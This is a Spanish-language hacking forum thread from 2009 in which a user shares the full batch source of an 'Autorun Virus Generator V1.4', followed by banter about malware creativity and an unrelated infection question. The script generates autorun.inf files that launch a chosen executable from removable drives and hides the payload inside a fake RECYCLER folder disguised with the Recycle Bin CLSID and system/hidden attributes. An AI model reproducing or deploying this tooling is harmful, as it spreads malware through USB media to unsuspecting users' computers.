Tema destacado: [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware
 Autor
|
Tema: [V][Bat]Autorun Virus Generator V1.3 (Mejorado el Metodo RECYCLER) (Leído 6,044 veces)
|
|
[Zero]
|
ni tampoco los troyanos rats ni nada de esas %$#%&#, todo esto ya esta hecho y y hay referencia de sobra
Hay troyanos y troyanos, por el mero hecho de que "algún tipo de troyano" esté muy documentado no quiere decir que no se puedan hacer buenos trabajos, aunque en parte tienes razón, ultimamente todos los troyanos son el mismo  . Con respecto a la herramienta, pues es un comienzo, yo empecé por cosas peores, pero no entiendo una cosa, si tenías/tienes una versión con 140 opciones, porque no liberas el source de esa versión en vez de sacar ésta? Saludos
|
|
|
|
|
En línea
|
“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.” Nietzsche |
|
|
[L]ord [R]NA
 Desconectado
Mensajes: 1.507
El Dictador y Verdugo de H-Sec
|
el mejor creador de malware q hize es el batch virus generator... pero lo cerraron x no poner el source  claro, tiene 140 opciones y este solo 3  Creador de malware eso sera una ofensa al arte del malware, el malware es creacion con imaginacion y un Generador no tiene imaginacion!!! ni tampoco los troyanos rats ni nada de esas %$#%&#, todo esto ya esta hecho y y hay referencia de sobra , si hablamos de imaginacion pues esto que hacen no tiene nada de novedoso. afortunadamente aqui en el hacker cuentan con karkcrak  mmm vaya error... cabe señalarte que como colaborador de Gedzac veo que debes de estar familiariazado con el malware y entras en un grave error cuando cides que porque algo este hecho y exista referencia de sobra ya no hay imaginacion debido a que no hay novedad. Si no existiese novedad alguna empresa antivirus pone una firma y listo, se acabo todo el problema de la red. Todo cambia, que un troyano realice funciones que realiza otro no quiere decir que sean el mismo. Osea que la imaginacion todavia existe PSData: Danni deberias de entregar la herramienta en un bat para que quien quiera la modifique instantaneamente y no tenga que buscar el source, el bat to exe le agrega demasiado espacio a algo tan simple
|
|
|
|
« Última modificación: 23 Diciembre 2009, 19:24 por Karcrack »
|
En línea
|
|
|
|
|
Karcrack
|
No siempre se trata de hacer cosas super novedosas, ya que eso es realmente complicado, sino de MEJORAR conceptos! Aunque hagas algo que ya existe, hazlo mejor!
afortunadamente aqui en el hacker cuentan con karkcrak Gracias hombre  |
|
|
|
« Última modificación: 23 Diciembre 2009, 19:24 por Karcrack »
|
En línea
|
|
|
|
Danni
Desconectado
Mensajes: 34
|
fa alto spam tiene este topic , bueno , ya q tuvo muchas respuestas dejo la V1.4 q tiene bugs corregidos @echo off
@mode con cols=51 lines=14
color 80
title Autorun Virus Generator V1.4
echo Para mejorar la propagacion del server es
echo recomendable que este tenga las opcion
echo "Autostart" agregada previamente.
echo.
pause
:Main
cls
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Autorun Virus Generator V1.4 º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°º
echo ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo º ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º
echo º º 1.Generar Autorun º º 2.Generar RECYCLER º º
echo º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ º
echo º ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º
echo º º 3.Meter .exe en Autorun º º 4.Salir º º
echo º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍͼ º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
set /p opc=
if %opc% == 1 (goto 1)
if %opc% == 2 (goto 2)
if %opc% == 3 (goto 3)
if %opc% == 4 (goto 4)
if not defined %opc% (goto Main)
:1
cls && echo Escriba el nombre y la extension del
echo ejecutable que quiere que se ejecute.
echo.
set /p name1=
cls && echo Escriba el nombre que quiere que tenga la
echo memoria extraible.
echo.
set /p name2=
cls && echo Escriba el nombre que quiere que tenga la
echo opcion en la ventana del autoplay.
echo.
set /p name3=
cls && echo Pulse una tecla para procesar . . .
pause > nul
(
echo [Autorun]
echo Open=%name1%
echo Icon=%%windir%%\System32\SHELL32.DLL,4
echo Label=%name2%
echo UseAutoPlay=1
echo Action=%name3%
echo Action= @%name1%
echo Shell\Open=Abrir
echo Shell\Open\Command=%name1%
echo Shell\Open\Default=1
echo Shell\Explore=Explorar
echo Shell\Explore\Command=%name1%
) >> autorun.inf
cls && echo.
echo El autorun.inf se ha creado correctamente en el
echo directorio actual.
echo.
pause && goto Main
:2
cls && echo Para que se logre una propagacion al estilo
echo del RECYCLER es necesario crear una carpeta oculta
echo y mover el server dentro de la carpeta.
echo.
echo Esta seguro que desea continuar?(S/N)
echo.
set /p opc2=
if %opc2% == S (goto 2.1)
if %opc2% == N (goto Main)
:2.1
cls && echo Escriba el nombre y la extension del
echo archivo a propagar.
echo.
set /p name4=
cls && echo Escriba el nombre que quiere que tenga la
echo carpeta RECYCLER.
echo.
set /p name5=
cls && echo Pulse una tecla para procesar . . .
pause > nul
md %name5% > nul && md %name5%\S-1-5-21-1482476501-1644491937-682003330-1013 > nul
(
echo [.ShellClassInfo]
echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}
) >> %name5%\S-1-5-21-1482476501-1644491937-682003330-1013\Desktop.ini
(
echo [Autorun]
echo Open=%name5%\S-1-5-21-1482476501-1644491937-682003330-1013\%name4%
echo Icon=%%windir%%\system32\SHELL32.dll,4
echo Action=Abrir carpeta para ver archivos
echo Shell\Open=Abrir
echo Shell\Open\Command=%name5%\S-1-5-21-1482476501-1644491937-682003330-1013\%name4%
echo Shell\Open\Default=1
) >> autorun.inf
move %name4% %name5%\S-1-5-21-1482476501-1644491937-682003330-1013 > nul
attrib +s +h %name5%\*.* /d /s
cls && echo.
echo La carpeta ha sido creada correctamente en el
echo directorio actual.
echo.
pause && goto Main
:3
cls && echo Escriba el nombre y la extension del
echo ejecutable a compilar con el autorun.
echo.
set /p name6=
cls && echo Pulse una tecla para procesar . . .
pause > nul
(
echo [Autorun]
echo Open=%name6%
echo Icon=%%windir%%\System32\SHELL32.DLL,4
echo UseAutoPlay=1
echo Action= @%name6%
echo Shell\Open=Abrir
echo Shell\Open\Command=%name6%
echo Shell\Open\Default=1
echo Shell\Explore=Explorar
echo Shell\Explore\Command=%name6%
) >> autorun.inf
copy /b %name6%+autorun.inf %name6%.inf > nul && del /f /q /s autorun.inf > nul
cls && echo.
echo El ejecutable se ha compilado correctamente con el
echo autorun.
echo.
pause && goto Main |
|
|
|
|
En línea
|
|
|
|
Castg!
Wiki
Desconectado
Mensajes: 1.187
|
no me respondiste los de los caracteres cosmicos! ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
|
|
|
En línea
|
|
|
|
|
Karcrack
|
Hice limpieza, mucha mierd a en el post.
no me respondiste los de los caracteres cosmicos! ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Esos caracteres son los que haran que se muestren los bordes de la 'ventana' como esta:  |
|
|
|
|
En línea
|
|
|
|
Castg!
Wiki
Desconectado
Mensajes: 1.187
|
pero haber, no me entinden, eso ya se, se que pasa eso, mi pregunta es porq pasa eso? no es deificl che! :XD
|
|
|
|
|
En línea
|
|
|
|
Helicot
Desconectado
Mensajes: 384
¿Q puedo colocar aki?
|
Me infecte con el virus, se crea un archivo llamado sessionstore-1.js el directorio Firefox\Profiles\c6kipbco.default, lo lleve a cuarentena, pero vuelve a crearse el archivo
como lo quito???
|
|
|
|
|
En línea
|
|
|
|
|
Karcrack
|
Me infecte con el virus, se crea un archivo llamado sessionstore-1.js el directorio Firefox\Profiles\c6kipbco.default, lo lleve a cuarentena, pero vuelve a crearse el archivo
como lo quito???
Creo que te has equivocado de virus... Esto no es un virus, sino un generador....
|
|
|
|
|
En línea
|
|
|
|
|
|
Danni
Desconectado
Mensajes: 34
|
esa "virus" es de las cookies
|
|
|
|
|
En línea
|
|
|
|
|
 |
